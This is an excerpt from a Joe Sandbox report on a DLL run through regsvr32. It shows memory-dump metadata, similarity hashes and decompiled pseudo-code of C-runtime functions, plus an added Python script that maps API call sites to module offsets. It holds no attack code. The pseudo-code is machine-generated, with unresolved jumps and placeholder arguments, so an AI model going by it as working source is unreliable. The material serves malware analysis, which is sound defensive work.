                                                                                                • API String ID: 3702945584-0
                                                                                                • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%
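
                                                                                                The following is an added example, not part of the Joe Sandbox report or its tooling: a small Python script that reads the "APIs" and "Memory Dump Source" entries of the function listing above and rebases each API call site (the "ref:" address) to an RVA inside the 64-bit module that regsvr32 (process 11) loaded at 0x180000000. Two things in it are assumptions rather than documented facts: the field layout of the .sdmp file names (process, run, dump id, region base, page protection) is inferred from the report itself, and a region is assumed to extend up to the next dumped base. The page-protection constants are the winnt.h values; the sample lines are copied verbatim from this listing.

```python
# Added example: rebase the API call sites of a Joe Sandbox function listing to RVAs
# of the dumped module (the 64-bit DLL regsvr32, process 11, loaded at 0x180000000).
import re
from dataclasses import dataclass, field
from typing import List, Optional

PROTECTION_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",  # winnt.h values
                    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# ASSUMPTION (inferred from the report, not documented on the page): a .sdmp name is
#   <process>.<run>.<dump id>.<region base>.<page protection>.<...>.sdmp
# Process 0xB = 11 and run 2 match hcaresult_11_2_180000000_regsvr32.jbxd, and field five
# carries the protection each PE section should have (0x20 .text, 0x02 headers/.rdata, 0x04 .data).
SDMP_RE = re.compile(r"(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.\d+\."
                     r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F.]+\.sdmp", re.I)
OFFSET_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-F]{16})", re.I)
# "FlsGetValue.KERNEL32(?,?,...,00000001800084A2), ref: 0000000180008017"
API_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{16})", re.I)


@dataclass
class Region:
    process: int
    run: int
    base: int
    protection: int

    def protection_name(self) -> str:
        return PROTECTION_NAMES.get(self.protection, f"0x{self.protection:02x}")


@dataclass
class ApiRef:
    api: str
    module: str
    call_site: int                  # VA of the call instruction ("ref:")
    stack_values: List[int]         # every qword in the argument dump
    return_addrs: List[int] = field(default_factory=list)  # the ones inside the module


@dataclass
class Listing:
    image_base: int
    regions: List[Region]
    api_refs: List[ApiRef]

    def rva(self, va: int) -> int:
        return va - self.image_base

    def region_for(self, va: int) -> Optional[Region]:
        # ASSUMPTION: only bases are known, so a region runs up to the next base (last: one page).
        ordered = sorted(self.regions, key=lambda r: r.base)
        for i, reg in enumerate(ordered):
            end = ordered[i + 1].base if i + 1 < len(ordered) else reg.base + 0x1000
            if reg.base <= va < end:
                return reg
        return None


def parse_listing(text: str) -> Listing:
    image_base, regions, api_refs = None, [], []
    for line in text.splitlines():
        if (m := OFFSET_RE.search(line)) and image_base is None:
            image_base = int(m["off"], 16)
        if m := SDMP_RE.search(line):
            regions.append(Region(int(m["proc"], 16), int(m["run"], 16),
                                  int(m["base"], 16), int(m["prot"], 16)))
        elif m := API_RE.search(line):
            qwords = [int(v, 16) for v in re.findall(r"\b[0-9A-F]{16}\b", m["args"], re.I)]
            api_refs.append(ApiRef(m["api"], m["module"], int(m["ref"], 16), qwords))
    if image_base is None:
        raise ValueError("no 'Offset:' line, cannot rebase")
    listing = Listing(image_base, regions, api_refs)
    # The argument dump is a slice of the stack at the call; qwords that land inside the
    # module are taken to be return addresses, i.e. the in-image call chain (heuristic).
    for ref in api_refs:
        ref.return_addrs = [v for v in ref.stack_values if listing.region_for(v) is not None]
    return listing


def summarize(listing: Listing) -> List[str]:
    """One line per API reference: call-site RVA, page protection, in-image callers."""
    out = []
    for ref in listing.api_refs:
        reg = listing.region_for(ref.call_site)
        where = reg.protection_name() if reg else "outside dumped regions"
        chain = ", ".join(f"0x{listing.rva(a):x}" for a in ref.return_addrs) or "-"
        out.append(f"{ref.api}.{ref.module} @ RVA 0x{listing.rva(ref.call_site):x} "
                   f"[{where}] called from RVA {chain}")
    return out


# Lines copied from the FlsGetValue/FlsSetValue function listing above (the report's own data).
SAMPLE = """\
• FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
• FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
• FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
• FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
• FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
"""

if __name__ == "__main__":
    for line in summarize(parse_listing(SAMPLE)):
        print(line)
```

                                                                                                The check this gives is the one worth making before reading the decompiled CRT functions: every call site here (RVA 0x8017 to 0x8080) and every recovered return address (0x827b, 0x8516, 0x84a2) sits in the single PAGE_EXECUTE_READ region at 0x180001000, which is what a normally mapped image section looks like. API references whose call site lands in a PAGE_READWRITE region would instead point at unpacked or injected code and deserve first attention.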

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID:
                                                                                                • API String ID: 3702945584-0
                                                                                                • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                				void* _t19;
                                                                                                				void* _t27;
                                                                                                				void* _t36;
                                                                                                				void* _t39;
                                                                                                				void* _t42;
                                                                                                				void* _t43;
                                                                                                				void* _t45;
                                                                                                				void* _t46;
                                                                                                				void* _t52;
                                                                                                				void* _t54;
                                                                                                				void* _t56;
                                                                                                				void* _t59;
                                                                                                
                                                                                                				_t27 = _t45;
                                                                                                				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                				_t43 = _t27 - 0x3f;
                                                                                                				_t46 = _t45 - 0xc0;
                                                                                                				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                                				E00000001180002D40(_t27);
                                                                                                				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                                				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                				E00000001180002D40(_t27);
                                                                                                				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                                				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                                				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                                				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                				if (_t19 == 0) goto 0x800038c3;
                                                                                                				return _t19;
                                                                                                			}
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
• Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
• Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
• Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 32%
                                                                                                			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                				void* __rdi;
                                                                                                				void* __rsi;
                                                                                                				void* __rbp;
                                                                                                				intOrPtr _t183;
                                                                                                				signed int _t187;
                                                                                                				signed int _t194;
                                                                                                				signed int _t199;
                                                                                                				intOrPtr _t208;
                                                                                                				void* _t210;
                                                                                                				signed char _t211;
                                                                                                				void* _t261;
                                                                                                				signed long long _t262;
                                                                                                				long long _t267;
                                                                                                				long long _t269;
                                                                                                				void* _t270;
                                                                                                				long long _t272;
                                                                                                				intOrPtr* _t278;
                                                                                                				intOrPtr* _t285;
                                                                                                				long long _t287;
                                                                                                				long long _t313;
                                                                                                				void* _t321;
                                                                                                				long long _t322;
                                                                                                				void* _t323;
                                                                                                				long long _t324;
                                                                                                				long long _t326;
                                                                                                				signed char* _t327;
                                                                                                				signed char* _t328;
                                                                                                				signed char* _t329;
                                                                                                				void* _t330;
                                                                                                				void* _t331;
                                                                                                				void* _t332;
                                                                                                				signed long long _t333;
                                                                                                				intOrPtr _t336;
                                                                                                				intOrPtr _t339;
                                                                                                				void* _t341;
                                                                                                				signed long long _t343;
                                                                                                				signed long long _t345;
                                                                                                				long long _t354;
                                                                                                				void* _t358;
                                                                                                				long long _t359;
                                                                                                				signed long long _t362;
                                                                                                				char _t363;
                                                                                                				signed long long _t364;
                                                                                                				void* _t367;
                                                                                                				signed char* _t368;
                                                                                                				signed long long _t370;
                                                                                                
                                                                                                				_t261 = _t332;
                                                                                                				_t331 = _t261 - 0x57;
                                                                                                				_t333 = _t332 - 0xd0;
                                                                                                				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                                				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                                				_t262 =  *0x80021010; // 0xeaed15642a89
                                                                                                				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                                				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                                				_t278 = __rcx;
                                                                                                				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                                				_t362 = __edx >> 6;
                                                                                                				 *(_t331 - 0x39) = _t362;
                                                                                                				_t370 = __edx + __edx * 8;
                                                                                                				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                                				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                                				r12d = r9d;
                                                                                                				_t359 = _t358 + __r8;
                                                                                                				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                                				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                                				0x80006f60();
                                                                                                				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                                				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                                				 *((long long*)(__rcx)) = _t267;
                                                                                                				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                                				_t343 = __edx >> 6;
                                                                                                				 *(_t331 - 0x11) = _t343;
                                                                                                				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                                				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                                				r12d = 1;
                                                                                                				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                                				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                                				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                                				_t367 = _t324 + 1;
                                                                                                				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                                				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                                				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                                				r12d = r12d + 1;
                                                                                                				_t183 = r12d - 1;
                                                                                                				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                                				_t336 = _t183;
                                                                                                				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                                				_t287 = _t324;
                                                                                                				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                                				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                                				if (_t336 <= 0) goto 0x8000d74b;
                                                                                                				0x80004b30();
                                                                                                				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                                				_t313 = _t324;
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                                				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                                				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                                				_t269 = _t331 - 1;
                                                                                                				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                                				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                                				r12d = _t187;
                                                                                                				r8d = _t187;
                                                                                                				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                                				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                                				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                                				goto 0x8000d8ae;
                                                                                                				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                                				_t210 = _t363 + 1;
                                                                                                				_t270 = _t210;
                                                                                                				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                                				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                                				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                                				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                                				r14d = _t194;
                                                                                                				r8d = _t194;
                                                                                                				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                				_t345 = _t331 - 0x51;
                                                                                                				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                                				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                                				_t327 = _t326 + _t363;
                                                                                                				r12d = r14d;
                                                                                                				_t364 =  *(_t331 - 0x39);
                                                                                                				goto 0x8000d8ae;
                                                                                                				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                                				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                                				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                                				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                                				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                                				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                                				r8d = 2;
                                                                                                				goto 0x8000d899;
                                                                                                				r9d =  *_t327 & 0x000000ff;
                                                                                                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                                				_t368 =  &(_t327[1]);
                                                                                                				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                                				r8d = 2;
                                                                                                				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                                				_t328 = _t368;
                                                                                                				goto 0x8000d8ae;
                                                                                                				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                                				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                                				_t329 =  &(_t328[1]);
                                                                                                				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                                				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                                				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                                				_t272 = _t331 + 0xf;
                                                                                                				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                                				r9d = r12d;
                                                                                                				_t341 = _t331 - 0x6d;
                                                                                                				E0000000118000A154();
                                                                                                				r14d = _t199;
                                                                                                				if (_t199 == 0) goto 0x8000da03;
                                                                                                				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                				r8d = _t199;
                                                                                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                                				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                                				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                                				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                                				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                				_t130 = _t272 - 0xc; // 0x1
                                                                                                				r8d = _t130;
                                                                                                				_t321 = _t331 - 0x71;
                                                                                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                                				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                                				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                                				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                                				goto 0x8000d681;
                                                                                                				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                                				_t330 = _t329 - _t368;
                                                                                                				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                                				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                                				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                                				goto 0x8000da03;
                                                                                                				if (_t341 <= 0) goto 0x8000d9da;
                                                                                                				_t322 = _t324;
                                                                                                				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                                				_t323 = _t322 + 1;
                                                                                                				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                                				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                                				goto 0x8000da03;
                                                                                                				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                                				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                                				_t173 = _t323 + 1; // 0x1
                                                                                                				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                                				goto 0x8000da03;
                                                                                                				 *_t278 = GetLastError();
                                                                                                				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                                			}

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                • String ID:
                                                                                                • API String ID: 2718003287-0
                                                                                                • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 28%
                                                                                                			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                				signed long long _v88;
                                                                                                				void* _v96;
                                                                                                				void* _v108;
                                                                                                				signed int _v112;
                                                                                                				intOrPtr _v120;
                                                                                                				signed int _v124;
                                                                                                				long _v128;
                                                                                                				signed int _v136;
                                                                                                				long long _v144;
                                                                                                				signed int _v152;
                                                                                                				void* __rbx;
                                                                                                				void* __rsi;
                                                                                                				void* __rbp;
                                                                                                				signed short _t99;
                                                                                                				void* _t107;
                                                                                                				long _t116;
                                                                                                				signed int _t117;
                                                                                                				void* _t122;
                                                                                                				signed short _t127;
                                                                                                				signed int _t130;
                                                                                                				signed short _t133;
                                                                                                				signed short _t159;
                                                                                                				signed short _t167;
                                                                                                				signed long long _t180;
                                                                                                				signed int _t184;
                                                                                                				signed short* _t197;
                                                                                                				signed int _t204;
                                                                                                				signed int _t205;
                                                                                                				signed short* _t206;
                                                                                                				void* _t208;
                                                                                                				signed long long _t220;
                                                                                                				void* _t221;
                                                                                                				signed long long _t222;
                                                                                                				signed long long _t223;
                                                                                                				void* _t224;
                                                                                                				signed short* _t226;
                                                                                                
                                                                                                				_t197 = __rdx;
                                                                                                				_t122 = __ebx;
                                                                                                				r14d = r8d;
                                                                                                				_t184 = __r9;
                                                                                                				_t206 = __rdx;
                                                                                                				if (r8d == 0) goto 0x8000e1d3;
                                                                                                				if (__rdx != 0) goto 0x8000df47;
                                                                                                				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                				r8d = 0;
                                                                                                				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                				r9d = 0;
                                                                                                				_v144 = __r9;
                                                                                                				_v152 = _t205;
                                                                                                				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                                				goto 0x8000e1d5;
                                                                                                				_t220 = __ecx >> 6;
                                                                                                				_v88 = _t220;
                                                                                                				_t223 = __ecx + __ecx * 8;
                                                                                                				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                                				_v136 = _t99;
                                                                                                				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                                				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                                				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                                				_t23 = _t197 + 2; // 0x2
                                                                                                				r8d = _t23;
                                                                                                				E0000000118000E958(r15d);
                                                                                                				_v112 = _t205;
                                                                                                				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                                				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                                				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                                				0x80006f60();
                                                                                                				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                                				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                                				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                                				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                                				_t127 = _v136;
                                                                                                				_t159 = _t127;
                                                                                                				if (_t159 == 0) goto 0x8000e099;
                                                                                                				if (_t159 == 0) goto 0x8000e024;
                                                                                                				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                                				_t221 = _t206 + _t224;
                                                                                                				_v128 = _t205;
                                                                                                				_t226 = _t206;
                                                                                                				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                                				r14d = _v124;
                                                                                                				_v136 =  *_t226 & 0x0000ffff;
                                                                                                				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                                				_t130 = _v136 & 0x0000ffff;
                                                                                                				if (_t107 != _t130) goto 0x8000e087;
                                                                                                				r14d = r14d + 2;
                                                                                                				_v124 = r14d;
                                                                                                				if (_t130 != 0xa) goto 0x8000e07c;
                                                                                                				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                                				r14d = r14d + 1;
                                                                                                				_v124 = r14d;
                                                                                                				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                                				goto 0x8000e038;
                                                                                                				_v128 = GetLastError();
                                                                                                				_t222 = _v88;
                                                                                                				goto 0x8000e153;
                                                                                                				r9d = r14d;
                                                                                                				_v152 = __r9;
                                                                                                				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                                				asm("movsd xmm0, [eax]");
                                                                                                				goto 0x8000e158;
                                                                                                				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                                				_t133 = _v136;
                                                                                                				_t167 = _t133;
                                                                                                				if (_t167 == 0) goto 0x8000e10c;
                                                                                                				if (_t167 == 0) goto 0x8000e0f8;
                                                                                                				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                                				r9d = r14d;
